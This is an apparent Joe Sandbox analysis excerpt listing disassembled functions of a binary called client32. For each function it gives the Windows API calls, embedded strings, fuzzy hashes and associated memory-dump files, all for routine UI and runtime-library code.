Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6

Uniqueness

Uniqueness Score: -1.00%

Function 11002590 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

SetROP2.GDI32(?,00000007), ref: 110025A5
SelectObject.GDI32(?,?), ref: 110025B2
MoveToEx.GDI32(?,?,?,00000000), ref: 110025C8
LineTo.GDI32(?,?,?), ref: 110025D7
SelectObject.GDI32(?,?), ref: 110025E2
SetROP2.GDI32(?,?), ref: 110025ED

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ObjectSelect$LineMove
String ID:
API String ID: 359220273-0
Opcode ID: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
Instruction ID: 21f229d1c7d8c8dc4b4b16be7dffbf2429469ae1aeee6a23e1c2fe7cad82a0fa
Opcode Fuzzy Hash: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
Instruction Fuzzy Hash: CA012876201128BFD704DB95DD84DABF7ACFF89210B108256FD2883640D770AD018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 11146370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

Strings

%s: , xrefs: 1114641A
CLIENT32, xrefs: 111463B0, 1114640F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: %s: $CLIENT32
API String ID: 4139908857-407627211
Opcode ID: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
Instruction ID: af445439b6752a8968c272d87336ee6d3db593790a582df571d11f25a3ee04be
Opcode Fuzzy Hash: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
Instruction Fuzzy Hash: C241493550016ADBCB11CF24DC58AEEFBB9EF4630DF1486A4E82987680DB71964DCF90

Uniqueness

Uniqueness Score: -1.00%

Function 11179775 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
__isleadbyte_l.LIBCMT ref: 111797DC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B

Strings

pYqt, xrefs: 1117980D, 1117987B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: pYqt
API String ID: 3058430110-1213896493
Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1100A730 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1100A743

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_memmove.LIBCMT ref: 1100A7BD
_free.LIBCMT ref: 1100A828

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\AUDIO.CPP, xrefs: 1100A756
pwf, xrefs: 1100A75B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_free_malloc_memmovewsprintf
String ID: ..\ctl32\AUDIO.CPP$pwf
API String ID: 3104816145-666490700
Opcode ID: 60c896aa85a39ad254b9be5c21b650202aaee3c4b9b207204644d142d6248269
Instruction ID: 581ef00ae4605fdecff6601fc4aa0b047527882c826c5b368e05bdb4dbd8d909
Opcode Fuzzy Hash: 60c896aa85a39ad254b9be5c21b650202aaee3c4b9b207204644d142d6248269
Instruction Fuzzy Hash: 98318C75800B12AAC320CF69C8017AAFBF5FF94704B14C95AE89AD7B01F375E695C791

Uniqueness

Uniqueness Score: -1.00%

Function 11110530 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,0CBC1010,?,?), ref: 11110564
std::_Xinvalid_argument.LIBCPMT ref: 1111059E
SetEvent.KERNEL32(?), ref: 111105C9
LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 11110604

Strings

list<T> too long, xrefs: 11110599

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
String ID: list<T> too long
API String ID: 930337060-4027344264
Opcode ID: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
Instruction ID: 7bfaceea9a20e34aca0a829f3d9254b0af8797b3eeddb6bd678ff8280e03d006
Opcode Fuzzy Hash: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
Instruction Fuzzy Hash: C6314175A047059FD714CF64C984B56FBF9FB49314F10862EE8569BA44DB30F844CB51

Uniqueness

Uniqueness Score: -1.00%

Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32 ref: 11093424
LoadIconA.USER32 ref: 11093456
LoadCursorA.USER32 ref: 11093465
RegisterClassA.USER32 ref: 11093483

Strings

NSMClassList, xrefs: 1109341E, 1109347C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassLoad$CursorIconInfoRegister
String ID: NSMClassList
API String ID: 2883182437-2474587545
Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5

Uniqueness

Uniqueness Score: -1.00%

Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 11145678
wsprintfA.USER32 ref: 1114568E

Strings

i < cchBuf, xrefs: 111456A5
#%d, xrefs: 11145688
..\ctl32\util.cpp, xrefs: 111456A0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 1115E750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

BringWindowToTop.USER32(?), ref: 1115E78C
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 1115E7A5

Strings

MMPlayer, xrefs: 1115E76E
MMPlayerOnTop, xrefs: 1115E769

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Bring
String ID: MMPlayer$MMPlayerOnTop
API String ID: 3868984299-4271085576
Opcode ID: f4efc3a9266972a411b5c6b596a7159dc9afb7610949befdfef627695acfe289
Instruction ID: 8916c069bb06823c575daa700f01655229a7ee1682237ba16ad4f0d17eb11653
Opcode Fuzzy Hash: f4efc3a9266972a411b5c6b596a7159dc9afb7610949befdfef627695acfe289
Instruction Fuzzy Hash: 82016238780711BBE7708B74CD45F96F2A4AB48F21F300A18B3B6AB6C4C6B4B440C758

Uniqueness

Uniqueness Score: -1.00%

Function 11146190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA

GetSysColor.USER32(0000000F), ref: 111461A9
LoadBitmapA.USER32 ref: 111461BF
SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 111461FB

Strings

hGrip || !"Unable to load sizing grip bitmap", xrefs: 111461DE
..\ctl32\util.cpp, xrefs: 111461D9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
API String ID: 1044520585-3315463184
Opcode ID: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
Instruction ID: 8e565c128ad7df1c8f5e5c04fb88379ac646e9871c4513a0e4d424585abd715b
Opcode Fuzzy Hash: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
Instruction Fuzzy Hash: 0DF0BB79A4032577E61456F19D05FEBBA5C9B44F5DF004430FE19A7A82DE78D900C3E5

Uniqueness

Uniqueness Score: -1.00%

Function 11004210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowsleepCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000060C,00000002,00000000), ref: 1100422E
Sleep.KERNEL32(00000064), ref: 11004236
SendMessageA.USER32(?,0000060C,00000003,00000000), ref: 11004249

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 1100425A
m_pToolbar, xrefs: 1100425F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$Sleep
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
API String ID: 2158920685-281161189
Opcode ID: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
Instruction ID: e130d243a18c05c63e38ab9a554661a07bf0098fc6b996864d1fadb4c15248a9
Opcode Fuzzy Hash: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
Instruction Fuzzy Hash: B4F0A435B80710AFE228EBA0DC45F47B3E6BBC8704F014214F6119B691D770A901CB44

Uniqueness

Uniqueness Score: -1.00%

Function 11146140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA

LoadLibraryA.KERNEL32(gdi32.dll,?,775F17C0,?,11003D52,00000000,00000008), ref: 11146155
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11146167
FreeLibrary.KERNEL32(00000000,?,11003D52,00000000,00000008), ref: 1114617E

Strings

gdi32.dll, xrefs: 11146150
SetLayout, xrefs: 11146161

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
String ID: SetLayout$gdi32.dll
API String ID: 796689547-836973393
Opcode ID: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
Instruction ID: d41aa01a6e476ec3efb0e30ba4a4f3b24d6e29c0e630937b51d8ced853034778
Opcode Fuzzy Hash: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
